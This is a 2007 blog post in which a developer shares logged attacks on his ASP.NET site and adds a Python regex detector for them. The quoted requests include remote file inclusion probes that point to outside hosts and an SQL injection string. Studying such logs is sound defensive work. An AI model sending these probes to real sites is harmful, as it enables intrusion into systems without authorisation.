July 2, 2007

Web Hackers

You've got to love some of the hacks that people try to do on the net. I've actually been amazed by the sheer quantity of hacks against our servers at work. Fortunately, the vast majority of them have been from idiots.

For example, these attempts:

/Blog/Pastblogs.aspx?CustomerID=1123249/admin/includes/admin_header.php?level=http://www.solidarite-sida.org/test/echo.txt?

/Blog/Pastblogs.aspx?CustomerID=1123249/admin/includes/author_panel_header.php?level=http://www.the-esao.com/imag/stringa.txt?

/Blog/Pastblogs.aspx?CustomerID=1123249/admin/includes/author_panel_header.php?level=http://www.solidarite-sida.org/test/echo.txt?

Yes, because PHP includes work so well on an ASP.NET site...

Then there are the SQL injection attempts:

/wiki/wiki_content.aspx?wikiid=102'%20and%201=1%20and%20''='

I'm glad we used parameterized queries or stored procedures only...

Then there's hidden field injection:

A potentially dangerous Request.Form value was detected from the client (hidCustomer="<a href="http://vfaxf...">).


Stuff like this is why I prefer not to disable HttpRequestValidationException. It's also why I'm trying to phase out hidden fields.
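An added example, not part of the original post: a log-triage function that labels request lines shaped like the remote-include and SQL injection attempts quoted above. The sample lines are constructed (the remote host is a placeholder), and the label names and the ASP.NET-only assumption behind the `.php` check are mine.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed samples shaped like the requests quoted in the post;
# the remote host is a placeholder, not one of the logged hosts.
SAMPLE_REQUESTS = [
    "/Blog/Pastblogs.aspx?CustomerID=1123249/admin/includes/admin_header.php"
    "?level=http://example.test/echo.txt?",
    "/wiki/wiki_content.aspx?wikiid=102'%20and%201=1%20and%20''='",
    "/Blog/Pastblogs.aspx?CustomerID=1123249",
    "/wiki/wiki_content.aspx?wikiid=102",
]

# A parameter value that is itself an absolute URL: remote file inclusion probe.
REMOTE_URL = re.compile(r"=\s*(?:https?|ftp)://", re.I)
# A single quote followed by a boolean keyword: SQL injection probe.
SQL_PROBE = re.compile(r"'\s*(?:and|or)\b", re.I)
# A script extension for a platform the site does not run
# (assumption: the site serves ASP.NET only, as the post implies).
FOREIGN_EXT = re.compile(r"\.php\b", re.I)


def classify(request_line):
    """Return the sorted probe labels matching one logged path + query string."""
    # Everything after the first '?' is the query, including the PHP path
    # the scanner glued onto the CustomerID value.
    query = unquote(urlsplit(request_line).query)  # decode %20, %27 once
    labels = set()
    if REMOTE_URL.search(query):
        labels.add("remote-include")
    if SQL_PROBE.search(query):
        labels.add("sql-injection")
    if FOREIGN_EXT.search(query):
        labels.add("wrong-platform")
    return sorted(labels)


def triage(request_lines):
    """Map each flagged request line to its labels; clean lines are omitted."""
    flagged = {}
    for line in request_lines:
        labels = classify(line)
        if labels:
            flagged[line] = labels
    return flagged


if __name__ == "__main__":
    for line, labels in triage(SAMPLE_REQUESTS).items():
        print(", ".join(labels), "<-", line)
```

The patterns are for sorting log noise, not for blocking: a legitimate value containing `' or` would also be flagged, and double-encoded input is decoded only once.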

Any funky hacks that you guys have been seeing lately?

2 comments:

Sarkie said...

Can you add a few < /br> or fix it for really long lines, please Mr Rom. :)


Also, no one cares about our client's sites yet for them to try.

I initially thought you were going to post about MS.co.uk SQL injection hack.


The only successful injection on any page was by you, Mike, cos you're an ass!

Dave :0

Sarkie said...

Meh, it's a Firefox issue. Makes a change. :)